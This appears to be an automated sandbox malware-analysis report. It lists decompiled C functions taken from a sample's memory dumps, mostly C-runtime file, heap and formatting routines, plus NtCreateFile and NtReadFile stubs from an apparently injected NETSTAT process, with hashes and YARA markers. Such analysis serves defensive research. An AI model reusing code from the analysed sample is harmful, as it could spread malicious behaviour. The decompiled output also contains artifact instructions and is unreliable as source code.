                								_t138 = 1;
                								__eflags =  *((char*)(_t90 + 0xece408));
                								if( *((char*)(_t90 + 0xece408)) == 0) {
                									_t41 = _t150 - 0x10; // 0xeb2b47
                									_t125 =  *_t41;
                									while(1) {
                										__eflags = _t138 - 4;
                										if(_t138 > 4) {
                											break;
                										}
                										__eflags = _t147 - _t125;
                										if(_t147 >= _t125) {
                											_t147 = _t147 - 1;
                											_t138 = _t138 + 1;
                											_t109 =  *_t147 & 0x000000ff;
                											__eflags =  *((char*)(_t109 + 0xece408));
                											if( *((char*)(_t109 + 0xece408)) == 0) {
                												continue;
                											}
                										}
                										break;
                									}
                									_t122 =  *(_t150 - 0x24);
                								}
                								_t92 =  *((char*)(( *_t147 & 0x000000ff) + 0xece408));
                								__eflags = _t92;
                								if(_t92 != 0) {
                									__eflags = _t92 + 1 - _t138;
                									if(_t92 + 1 != _t138) {
                										_t129 =  *((intOrPtr*)(0xecf230 +  *(_t150 - 0xc) * 4));
                										__eflags =  *(_t129 + _t122 + 4) & 0x00000048;
                										if(__eflags == 0) {
                											asm("cdq");
                											L00EB3F56(_t129, __eflags,  *((intOrPtr*)(_t150 + 8)),  ~_t138,  ~_t138, 1);
                											_t152 = _t152 + 0x10;
                										} else {
                											_t149 =  &(_t147[1]);
                											 *((char*)(_t129 + _t122 + 5)) =  *_t147;
                											_t105 =  *(_t150 - 0xc);
                											__eflags = _t138 - 2;
                											if(_t138 >= 2) {
                												_t107 =  *_t149;
                												_t149 = _t149 + 1;
                												__eflags = _t149;
                												 *((char*)( *((intOrPtr*)(0xecf230 + _t105 * 4)) + _t122 + 0x25)) = _t107;
                												_t105 =  *(_t150 - 0xc);
                											}
                											__eflags = _t138 - 3;
                											if(_t138 == 3) {
                												_t106 =  *_t149;
                												_t149 = _t149 + 1;
                												__eflags = _t149;
                												 *((char*)( *((intOrPtr*)(0xecf230 + _t105 * 4)) + _t122 + 0x26)) = _t106;
                											}
                											_t147 = _t149 - _t138;
                										}
                									} else {
                										_t147 =  &(_t147[_t138]);
                									}
                									goto L54;
                								} else {
                									 *((intOrPtr*)(E00EAF100())) = 0x2a;
                									goto L3;
                								}
                							} else {
                								_t147 =  &(_t147[1]);
                								L54:
                								_t66 = _t150 - 0x10; // 0xeb2b47
                								_t144 =  *_t66;
                								_t148 = _t147 - _t144;
                								_t142 = MultiByteToWideChar(0xfde9, 0, _t144, _t148,  *(_t150 + 0xc),  *(_t150 - 0x28) >> 1);
                								if(_t142 == 0) {
                									_t100 = GetLastError();
                									E00EAF0DF(_t100);
                									L3:
                									_t123 = _t122 | 0xffffffff;
                									__eflags = _t123;
                									_t1 = _t150 - 0x10; // 0xeb2b47
                									_t86 =  *_t1;
                								} else {
                									_t165 = _t142 - _t148;
                									_t142 = _t142 + _t142;
                									 *( *((intOrPtr*)(0xecf230 +  *(_t150 - 0xc) * 4)) + _t122 + 0x30) = 0 | _t165 != 0x00000000;
                									asm("sbb [eax], dh");
                									_t75 = _t150 - 0x10; // 0xeb2b47
                									_t86 =  *_t75;
                									goto L58;
                								}
                							}
                						}
                						L59:
                						if(_t86 !=  *(_t150 + 0xc)) {
                							E00EB2248(_t86);
                						}
                						if(_t123 != 0xfffffffe) {
                							_t142 = _t123;
                						}
                						_t87 = _t142;
                						return _t87;
                					}
                					goto L33;
                					L14:
                					if( *(_t150 - 0x14) == 0) {
                						goto L29;
                					} else {
                						_t136 =  *(_t150 - 0xc);
                						if(( *( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122 + 4) & 0x00000048) == 0) {
                							_t23 = _t150 - 0x10; // 0xeb2b47
                							__eflags = _t145 -  *_t23;
                							if(__eflags != 0) {
                								L26:
                								L00EB3F56(_t126, __eflags,  *((intOrPtr*)(_t150 + 8)), 0xffffffff, 0xffffffff, 1);
                								_t136 =  *(_t150 - 0xc);
                								_t152 = _t152 + 0x10;
                								_t117 = 0xa;
                								__eflags =  *(_t150 - 1) - _t117;
                								if( *(_t150 - 1) == _t117) {
                									goto L22;
                								} else {
                									_t126 = 0xd;
                									 *_t145 = _t126;
                									goto L28;
                								}
                								goto L59;
                							} else {
                								_t118 = 0xa;
                								__eflags =  *(_t150 - 1) - _t118;
                								if(__eflags != 0) {
                									goto L26;
                								} else {
                									 *_t145 = _t118;
                									_t145 = _t145 + 1;
                									__eflags = _t145;
                									L22:
                									_push(0xd);
                									goto L23;
                								}
                							}
                						} else {
                							_t119 = 0xa;
                							_push(0xd);
                							if( *(_t150 - 1) != _t119) {
                								 *_t145 = 0xd;
                								_t145 = _t145 + 1;
                								 *((char*)( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122 + 5)) =  *(_t150 - 1);
                							} else {
                								 *_t145 = _t119;
                								_t145 = _t145 + 1;
                							}
                							L23:
                							_pop(_t126);
                						}
                					}
                					goto L24;
                				}
                			}







































                APIs
                • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47), ref: 00EAFB7C
                • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?,00000080,00000003), ref: 00EAFB86
                • __lseeki64_nolock.LIBCMT ref: 00EAFBF1
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,G+,G+,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00EAFD1F
                • _free.LIBCMT ref: 00EAFD52
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ByteCharErrorFileLastMultiReadWide__lseeki64_nolock_free
                • String ID: G+
                • API String ID: 1844164652-804368800
                • Opcode ID: 21390e061c66065c7d4ee5e22fad37ea63a50d7a5f92c400cc64ffeda891c4a3
                • Instruction ID: 7392e6b12f26c4e0a492a304c54e8623a1ec96900f0ca7c4519a7a573e700583
                • Opcode Fuzzy Hash: 21390e061c66065c7d4ee5e22fad37ea63a50d7a5f92c400cc64ffeda891c4a3
                • Instruction Fuzzy Hash: D221F535A002059FDB11CFE9D884FAEB7B5AF4A714F145075E955FF290CA31A8468B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00EAE4C2(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                				char* _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				void* __ebx;
                				void* __esi;
                				signed int _t74;
                				signed int _t78;
                				char _t81;
                				signed int _t86;
                				signed int _t88;
                				signed int _t91;
                				signed int _t94;
                				signed int _t97;
                				signed int _t98;
                				char* _t99;
                				signed int _t100;
                				signed int _t102;
                				signed int _t103;
                				signed int _t104;
                				char* _t110;
                				signed int _t113;
                				signed int _t117;
                				signed int _t119;
                				void* _t120;
                
                				_t99 = _a4;
                				_t74 = _a8;
                				_v8 = _t99;
                				_v12 = _t74;
                				if(_a12 == 0) {
                					L5:
                					return 0;
                				}
                				_t97 = _a16;
                				if(_t97 == 0) {
                					goto L5;
                				}
                				if(_t99 != 0) {
                					_t119 = _a20;
                					__eflags = _t119;
                					if(_t119 == 0) {
                						L9:
                						__eflags = _a8 - 0xffffffff;
                						if(_a8 != 0xffffffff) {
                							_t74 = E00EAE740(_t99, 0, _a8);
                							_t120 = _t120 + 0xc;
                						}
                						__eflags = _t119;
                						if(_t119 == 0) {
                							goto L3;
                						} else {
                							_t78 = _t74 | 0xffffffff;
                							__eflags = _t97 - _t78 / _a12;
                							if(_t97 > _t78 / _a12) {
                								goto L3;
                							}
                							L13:
                							_t117 = _a12 * _t97;
                							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                							_t98 = _t117;
                							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                								_t100 = 0x1000;
                							} else {
                								_t100 =  *(_t119 + 0x18);
                							}
                							_v16 = _t100;
                							__eflags = _t117;
                							if(_t117 == 0) {
                								L41:
                								return _a16;
                							} else {
                								do {
                									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                										L24:
                										__eflags = _t98 - _t100;
                										if(_t98 < _t100) {
                											_t81 = E00EAF572(_t98, _t100, _t119, _t119);
                											__eflags = _t81 - 0xffffffff;
                											if(_t81 == 0xffffffff) {
                												L46:
                												return (_t117 - _t98) / _a12;
                											}
                											_t102 = _v12;
                											__eflags = _t102;
                											if(_t102 == 0) {
                												L42:
                												__eflags = _a8 - 0xffffffff;
                												if(_a8 != 0xffffffff) {
                													E00EAE740(_a4, 0, _a8);
                												}
                												 *((intOrPtr*)(E00EAF100())) = 0x22;
                												L4:
                												E00EAEB1E();
                												goto L5;
                											}
                											_t110 = _v8;
                											 *_t110 = _t81;
                											_t98 = _t98 - 1;
                											_v8 = _t110 + 1;
                											_t103 = _t102 - 1;
                											__eflags = _t103;
                											_v12 = _t103;
                											_t100 =  *(_t119 + 0x18);
                											_v16 = _t100;
                											goto L40;
                										}
                										__eflags = _t100;
                										if(_t100 == 0) {
                											_t86 = 0x7fffffff;
                											__eflags = _t98 - 0x7fffffff;
                											if(_t98 <= 0x7fffffff) {
                												_t86 = _t98;
                											}
                										} else {
                											__eflags = _t98 - 0x7fffffff;
                											if(_t98 <= 0x7fffffff) {
                												_t44 = _t98 % _t100;
                												__eflags = _t44;
                												_t113 = _t44;
                												_t91 = _t98;
                											} else {
                												_t113 = 0x7fffffff % _t100;
                												_t91 = 0x7fffffff;
                											}
                											_t86 = _t91 - _t113;
                										}
                										__eflags = _t86 - _v12;
                										if(_t86 > _v12) {
                											goto L42;
                										} else {
                											_push(_t86);
                											_push(_v8);
                											_push(E00EAF693(_t119));
                											_t88 = E00EAF84A();
                											_t120 = _t120 + 0xc;
                											__eflags = _t88;
                											if(_t88 == 0) {
                												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                												goto L46;
                											}
                											__eflags = _t88 - 0xffffffff;
                											if(_t88 == 0xffffffff) {
                												L45:
                												_t64 = _t119 + 0xc;
                												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                												__eflags =  *_t64;
                												goto L46;
                											}
                											_t98 = _t98 - _t88;
                											__eflags = _t98;
                											L36:
                											_v8 = _v8 + _t88;
                											_v12 = _v12 - _t88;
                											_t100 = _v16;
                											goto L40;
                										}
                									}
                									_t94 =  *(_t119 + 4);
                									_v20 = _t94;
                									__eflags = _t94;
                									if(__eflags == 0) {
                										goto L24;
                									}
                									if(__eflags < 0) {
                										goto L45;
                									}
                									__eflags = _t98 - _t94;
                									if(_t98 < _t94) {
                										_t94 = _t98;
                										_v20 = _t98;
                									}
                									_t104 = _v12;
                									__eflags = _t94 - _t104;
                									if(_t94 > _t104) {
                										goto L42;
                									} else {
                										E00EAF6B7(_v8, _t104,  *_t119, _t94);
                										_t88 = _v20;
                										_t120 = _t120 + 0x10;
                										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                										_t98 = _t98 - _t88;
                										 *_t119 =  *_t119 + _t88;
                										goto L36;
                									}
                									L40:
                									__eflags = _t98;
                								} while (_t98 != 0);
                								goto L41;
                							}
                						}
                					}
                					_t74 = (_t74 | 0xffffffff) / _a12;
                					__eflags = _t97 - _t74;
                					if(_t97 <= _t74) {
                						goto L13;
                					}
                					goto L9;
                				}
                				L3:
                				 *((intOrPtr*)(E00EAF100())) = 0x16;
                				goto L4;
                			}





























                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                • String ID:
                • API String ID: 1559183368-0
                • Opcode ID: 171d78fe311667b55df2c2311e6a58e3fdb198e453ef8cd83bddfebc46ad80a8
                • Instruction ID: 8e7d763c938ff3aabbd027699c607b274108f893b075d8a543be975250439fd3
                • Opcode Fuzzy Hash: 171d78fe311667b55df2c2311e6a58e3fdb198e453ef8cd83bddfebc46ad80a8
                • Instruction Fuzzy Hash: 1051B830E003059BDB289FA998845AE77A5AF5E328F149729F435BE3D0E770BD509B50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E00EA600E(void* __edx, void* __edi, void* __esi) {
                				long _t33;
                				signed int _t40;
                				signed int _t43;
                				signed char _t45;
                				void* _t47;
                				signed int _t52;
                				void* _t54;
                				signed int _t56;
                				void* _t57;
                				void* _t60;
                				signed int _t61;
                				void* _t62;
                
                				_t60 = __esi;
                				_t57 = __edi;
                				_t54 = __edx;
                				asm("in al, 0x0");
                				_t45 = 0;
                				if(( *(_t62 + 0xc) & 0x00000008) != 0) {
                					_t45 = 0x20;
                				}
                				if(( *(_t62 + 0xc) & 0x00004000) != 0) {
                					_t45 = _t45 | 0x00000080;
                				}
                				if(( *(_t62 + 0xc) & 0x00000080) != 0) {
                					_t45 = _t45 | 0x00000010;
                				}
                				_t33 = GetFileType( *(_t62 + 8));
                				if(_t33 != 0) {
                					__eflags = _t33 - 2;
                					if(__eflags != 0) {
                						__eflags = _t33 - 3;
                						if(__eflags == 0) {
                							_t45 = _t45 | 0x00000008;
                							__eflags = _t45;
                						}
                					} else {
                						_t45 = _t45 | 0x00000040;
                					}
                					_t61 = E00EB3A06(_t45, _t47, _t54, _t57, _t60, __eflags);
                					 *(_t62 + 0xc) = _t61;
                					__eflags = _t61 - 0xffffffff;
                					if(_t61 != 0xffffffff) {
                						 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
                						E00EB3DB2(_t61,  *(_t62 + 8));
                						_t56 = _t61 >> 5;
                						_t52 = (_t61 & 0x0000001f) << 6;
                						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 4) = _t45 | 0x00000001;
                						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) =  *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) & 0x00000080;
                						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) =  *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) & 0x0000007f;
                						 *((intOrPtr*)(_t62 - 0x1c)) = 1;
                						 *(_t62 - 4) = 0xfffffffe;
                						E00EB3D8D(1, _t61);
                						__eflags = 1;
                						if(1 == 0) {
                							_t61 = _t61 | 0xffffffff;
                							__eflags = _t61;
                						}
                						_t40 = _t61;
                					} else {
                						 *((intOrPtr*)(E00EAF100())) = 0x18;
                						_t43 = E00EAF0CC();
                						 *_t43 =  *_t43 & 0x00000000;
                						goto L9;
                					}
                				} else {
                					_t43 = E00EAF0DF(GetLastError());
                					L9:
                					_t40 = _t43 | 0xffffffff;
                				}
                				return E00EAF225(_t40);
                			}
















                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                • String ID:
                • API String ID: 43408053-0
                • Opcode ID: 848f810a2aa95084b9e8040f56c7cc9ff3325a041b0ff3dad74caf40290ba2d4
                • Instruction ID: 5672838568ea7ded5549dae1e5e3344575c7a96a7a6ffa5ebd023d4cb67f6592
                • Opcode Fuzzy Hash: 848f810a2aa95084b9e8040f56c7cc9ff3325a041b0ff3dad74caf40290ba2d4
                • Instruction Fuzzy Hash: C6213E315065015ECB219B79DC077DABF905F01338F28A719E8A07B2E3CB3597069F50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00EB6902(void* __ebx, void* __ecx, void* __edx, void* __edi, void* _a4, long _a8) {
                				void* _t7;
                				void* _t8;
                				intOrPtr* _t9;
                				intOrPtr* _t12;
                				void* _t20;
                				long _t32;
                
                				if(_a4 != 0) {
                					_t32 = _a8;
                					if(_t32 != 0) {
                						_push(__ebx);
                						while(_t32 <= 0xffffffe0) {
                							if(_t32 == 0) {
                								_t32 = _t32 + 1;
                							}
                							_t7 = HeapReAlloc( *0xecf22c, 0, _a4, _t32);
                							_t20 = _t7;
                							if(_t20 != 0) {
                								L17:
                								_t8 = _t20;
                							} else {
                								if( *0xed0060 == _t7) {
                									_t9 = E00EAF100();
                									 *_t9 = E00EAF159(GetLastError());
                									goto L17;
                								} else {
                									if(E00EB4C7E(_t7, _t32) == 0) {
                										_t12 = E00EAF100();
                										 *_t12 = E00EAF159(GetLastError());
                										L12:
                										_t8 = 0;
                									} else {
                										continue;
                									}
                								}
                							}
                							goto L14;
                						}
                						E00EB4C7E(_t6, _t32);
                						 *((intOrPtr*)(E00EAF100())) = 0xc;
                						goto L12;
                					} else {
                						E00EB2248(_a4);
                						_t8 = 0;
                					}
                					L14:
                					return _t8;
                				} else {
                					return E00EB6870(__ebx, __ecx, __edx, __edi, _a8);
                				}
                			}










                APIs
                • _malloc.LIBCMT ref: 00EB690E
                  • Part of subcall function 00EB6870: __FF_MSGBANNER.LIBCMT ref: 00EB6887
                  • Part of subcall function 00EB6870: __NMSG_WRITE.LIBCMT ref: 00EB688E
                  • Part of subcall function 00EB6870: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00EB22DE,00000000,00000000,00000000,00000000,?,00EB2193,00000018,00ECC228), ref: 00EB68B3
                • _free.LIBCMT ref: 00EB6921
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: AllocHeap_free_malloc
                • String ID:
                • API String ID: 2734353464-0
                • Opcode ID: b9308b57d57c78fb18ec6cf5c098717c595fc83990a99a0ee6aa0dc77a91db29
                • Instruction ID: bb3493447c2ffea952990fc9110f13710d528ae5e3e5da6c679e0dda08395ac7
                • Opcode Fuzzy Hash: b9308b57d57c78fb18ec6cf5c098717c595fc83990a99a0ee6aa0dc77a91db29
                • Instruction Fuzzy Hash: DE110A32405215EFCB212FB0FC057EB3BD4AF553A4F206539FA45FE161DB3988408691
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EC2241(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                				intOrPtr _t25;
                				void* _t26;
                
                				_t25 = _a16;
                				if(_t25 == 0x65 || _t25 == 0x45) {
                					_t26 = E00EC27B0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                					goto L9;
                				} else {
                					_t34 = _t25 - 0x66;
                					if(_t25 != 0x66) {
                						__eflags = _t25 - 0x61;
                						if(_t25 == 0x61) {
                							L7:
                							_t26 = E00EC22E5(_a4, _a8, _a12, _a20, _a24, _a28);
                						} else {
                							__eflags = _t25 - 0x41;
                							if(__eflags == 0) {
                								goto L7;
                							} else {
                								_t26 = E00EC2A64(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                							}
                						}
                						L9:
                						return _t26;
                					} else {
                						return E00EC2985(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                					}
                				}
                			}






                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 292b7bd2d9c99b2bb16a839906547967230dbf570db0668fca305cc88826b2c5
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: A4014B3200014ABBCF1A5E84DD41EEE3F62BF29358B58951DFB1868035D637C9B2AB81
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00EA6BF2(signed short* __ecx, void* __edx, signed char __esi, void* __eflags) {
                				intOrPtr _t14;
                				signed int _t15;
                				signed int _t17;
                				intOrPtr _t19;
                				void* _t21;
                				void* _t22;
                				signed int _t23;
                				signed short* _t25;
                				void* _t27;
                				signed int _t30;
                				void* _t32;
                				signed char _t33;
                				void* _t35;
                
                				_t33 = __esi;
                				_t27 = __edx;
                				_t25 = __ecx;
                				asm("cli");
                				if(__eflags < 0) {
                					 *((intOrPtr*)(_t35 + 0x10)) = 0x1a;
                					_t32 = 0xd;
                					while(1) {
                						_t17 =  *_t25 & 0x0000ffff;
                						if(_t17 ==  *((intOrPtr*)(_t35 + 0x10))) {
                							break;
                						}
                						if(_t17 == _t32) {
                							__eflags = _t25 - _t27 - 2;
                							if(_t25 < _t27 - 2) {
                								_t25 =  &(_t25[1]);
                								_t21 = 0xa;
                								__eflags =  *_t25 - _t21;
                								if( *_t25 != _t21) {
                									_t21 = 0xd;
                									_t32 = _t21;
                								}
                								 *_t33 = _t21;
                								_t33 = _t33 + 2;
                								__eflags = _t33;
                							}
                						} else {
                							 *_t33 = _t17;
                							_t33 = _t33 + 2;
                							_t25 =  &(_t25[1]);
                						}
                						if(_t25 < _t27) {
                							continue;
                						} else {
                						}
                						goto L19;
                					}
                					_t19 =  *((intOrPtr*)(0xecf230 +  *(_t35 - 0xc) * 4));
                					_t9 = _t19 + _t22 + 4;
                					 *_t9 =  *(_t19 + _t22 + 4) | 0x00000002;
                					__eflags =  *_t9;
                				}
                				L19:
                				_t13 = _t35 - 0x10; // 0xeb2b47
                				_t14 =  *_t13;
                				_t30 = _t33 - _t14 & 0xfffffffe;
                				_t23 =  *(_t35 - 0x18);
                				if(_t14 !=  *((intOrPtr*)(_t35 + 0xc))) {
                					E00EB2248(_t14);
                				}
                				if(_t23 != 0xfffffffe) {
                					_t30 = _t23;
                				}
                				_t15 = _t30;
                				return _t15;
                			}

















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __lseeki64_nolock_free
                • String ID: G+$G+
                • API String ID: 1437703282-4250722411
                • Opcode ID: c192cf80ce0b87e66fd4274a2a165142f6be05c12f7b8259ec445665c6d1a3b0
                • Instruction ID: f7cc905273a8573437fafaf7d41ef350bb67400dcf1eb5e4cdd8aca58f21581c
                • Opcode Fuzzy Hash: c192cf80ce0b87e66fd4274a2a165142f6be05c12f7b8259ec445665c6d1a3b0
                • Instruction Fuzzy Hash: 02F0F62260020583CB214FE898413B96391BF8B324F742736E925BF1E0D33578818241
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 285 7da32a-7da381 call 7daf30 NtCreateFile
                APIs
                • NtCreateFile.NTDLL(00000060,00000000,.z`,007D4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007D4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 007DA37D
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID: .z`
                • API String ID: 823142352-1441809116
                • Opcode ID: f135aac7ac35a8c0f6471782e6624f1f60dcef30933a7682c4cafdda7e9e19ee
                • Instruction ID: 3c91d7418bcedd49f83b8161e782dd1b368938b004a8603e7512fb5d6f8e0e9e
                • Opcode Fuzzy Hash: f135aac7ac35a8c0f6471782e6624f1f60dcef30933a7682c4cafdda7e9e19ee
                • Instruction Fuzzy Hash: BBF0BDB2215108BFCB48CF98DC95EEB33ADBF8C304F158249BA0E97241C630E8118BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 289 7da330-7da381 call 7daf30 NtCreateFile
                APIs
                • NtCreateFile.NTDLL(00000060,00000000,.z`,007D4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007D4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 007DA37D
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID: .z`
                • API String ID: 823142352-1441809116
                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                • Instruction ID: 7539aa2c9f3b04f5835f0828976fb475811c2eaca6d69d74803295615c20b845
                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                • Instruction Fuzzy Hash: 74F0BDB2211208ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97241C630E8118BA4
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 293 7da3db-7da3f6 294 7da3fc-7da429 NtReadFile 293->294 295 7da3f7 call 7daf30 293->295 295->294
                APIs
                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J},FFFFFFFF,?,rM},?,00000000), ref: 007DA425
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: 1J}
                • API String ID: 2738559852-4274715835
                • Opcode ID: 403fd95997e0d90c9885a290d1184dd89e016249acd1fca1f66b1da156cc10e2
                • Instruction ID: b62a1966dcf36630a9ca8b3fe8b08be399cdb06811e4237a9b4c66f0e16fb1d2
                • Opcode Fuzzy Hash: 403fd95997e0d90c9885a290d1184dd89e016249acd1fca1f66b1da156cc10e2
                • Instruction Fuzzy Hash: 27F0E2B2210108ABCB04DF89CC80EEB77ADEF8C714F058249FA0D97241C630E8118BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 296 7da3e0-7da429 call 7daf30 NtReadFile
                APIs
                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J},FFFFFFFF,?,rM},?,00000000), ref: 007DA425
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
